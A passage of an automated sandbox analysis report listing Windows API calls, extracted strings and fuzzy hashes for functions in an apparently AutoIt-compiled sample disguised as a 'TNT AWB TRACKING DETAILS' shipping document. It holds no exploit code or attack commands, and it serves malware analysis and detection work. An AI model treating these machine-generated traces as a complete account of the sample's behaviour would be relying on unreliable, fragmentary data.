                                      • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                      • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                      APIs
                                      • GetSysColor.USER32(0000000F), ref: 0044A05E
                                      • GetClientRect.USER32(?,?), ref: 0044A0D1
                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                      • GetWindowDC.USER32(?), ref: 0044A0F6
                                      • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                      • ReleaseDC.USER32(?,?), ref: 0044A11B
                                      • GetSysColor.USER32(0000000F), ref: 0044A131
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                      • GetSysColor.USER32(0000000F), ref: 0044A14F
                                      • GetSysColor.USER32(00000005), ref: 0044A15B
                                      • GetWindowDC.USER32(?), ref: 0044A1BE
                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                      • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                      • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                      • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                      • GetSysColor.USER32(00000008), ref: 0044A265
                                      • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                      • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                      • GetStockObject.GDI32(00000005), ref: 0044A28A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                      • String ID:
                                      • API String ID: 1744303182-0
                                      • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                      • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                      • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                      • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                      • __mtterm.LIBCMT ref: 00417C34
                                        • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                        • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                        • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                        • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                      • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                      • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                      • __init_pointers.LIBCMT ref: 00417CE6
                                      • __calloc_crt.LIBCMT ref: 00417D54
                                      • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                      • API String ID: 4163708885-3819984048
                                      • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                      • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                      • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                      • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: >>>AUTOIT SCRIPT<<<$\
                                      • API String ID: 0-1896584978
                                      • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                      • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                      • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                      • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: __wcsicoll$IconLoad
                                      • String ID: blank$info$question$stop$warning
                                      • API String ID: 2485277191-404129466
                                      • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                      • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                      • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                      • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                      APIs
                                      • LoadIconW.USER32(?,00000063), ref: 0045464C
                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                      • SetWindowTextW.USER32(?,?), ref: 00454678
                                      • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                      • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                      • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                      • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                      • GetWindowRect.USER32(?,?), ref: 004546F5
                                      • SetWindowTextW.USER32(?,?), ref: 00454765
                                      • GetDesktopWindow.USER32 ref: 0045476F
                                      • GetWindowRect.USER32(00000000), ref: 00454776
                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                      • GetClientRect.USER32(?,?), ref: 004547D2
                                      • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                      • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                      • String ID:
                                      • API String ID: 3869813825-0
                                      • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                      • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                      • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                      • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                      APIs
                                      • _wcslen.LIBCMT ref: 00464B28
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                      • _wcslen.LIBCMT ref: 00464C28
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                      • _wcslen.LIBCMT ref: 00464CBA
                                      • _wcslen.LIBCMT ref: 00464CD0
                                      • _wcslen.LIBCMT ref: 00464CEF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: _wcslen$Directory$CurrentSystem
                                      • String ID: D
                                      • API String ID: 1914653954-2746444292
                                      • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                      • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                      • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                      • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                      • API String ID: 3832890014-4202584635
                                      • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                      • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                      • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                      • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                      APIs
                                      • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                      • GetFocus.USER32 ref: 0046A0DD
                                      • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessagePost$CtrlFocus
                                      • String ID: 0
                                      • API String ID: 1534620443-4108050209
                                      • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                      • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                      • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                      • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                      APIs
                                      • DestroyWindow.USER32(?), ref: 004558E3
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$CreateDestroy
                                      • String ID: ,$tooltips_class32
                                      • API String ID: 1109047481-3856767331
                                      • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                      • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                      • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                      • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                      APIs
                                      • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                      • GetMenuItemCount.USER32(?), ref: 00468C45
                                      • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                      • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                      • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                      • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                      • GetMenuItemCount.USER32 ref: 00468CFD
                                      • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                      • GetCursorPos.USER32(?), ref: 00468D3F
                                      • SetForegroundWindow.USER32(?), ref: 00468D49
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                      • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                      • String ID: 0
                                      • API String ID: 1441871840-4108050209
                                      • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                      • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                      • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                      • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                      • __swprintf.LIBCMT ref: 00460915
                                      • __swprintf.LIBCMT ref: 0046092D
                                      • _wprintf.LIBCMT ref: 004609E1
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                      • API String ID: 3631882475-2268648507
                                      • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                      • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                      • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                      • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                      APIs
                                      • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                      • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                      • SendMessageW.USER32 ref: 00471740
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                      • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                      • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                      • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                      • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                      • SendMessageW.USER32 ref: 0047184F
                                      • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                      • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                      • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                      • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                      • String ID:
                                      • API String ID: 4116747274-0
                                      • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                      • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                      • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                      • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                      • _wcslen.LIBCMT ref: 00461683
                                      • __swprintf.LIBCMT ref: 00461721
                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                      • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                      • GetDlgCtrlID.USER32(?), ref: 00461869
                                      • GetWindowRect.USER32(?,?), ref: 004618A4
                                      • GetParent.USER32(?), ref: 004618C3
                                      • ScreenToClient.USER32(00000000), ref: 004618CA
                                      • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                      • String ID: %s%u
                                      • API String ID: 1899580136-679674701
                                      • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                      • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                      • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                      • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                      APIs
                                      • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                      • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                      • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: InfoItemMenu$Sleep
                                      • String ID: 0
                                      • API String ID: 1196289194-4108050209
                                      • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                      • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                      • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                      • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                      APIs
                                      • GetDC.USER32(00000000), ref: 0043143E
                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                      • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                      • SelectObject.GDI32(00000000,?), ref: 00431466
                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                      • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                      • String ID: (
                                      • API String ID: 3300687185-3887548279
                                      • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                      • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                      • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                      • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                      APIs
                                        • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                        • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                      • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
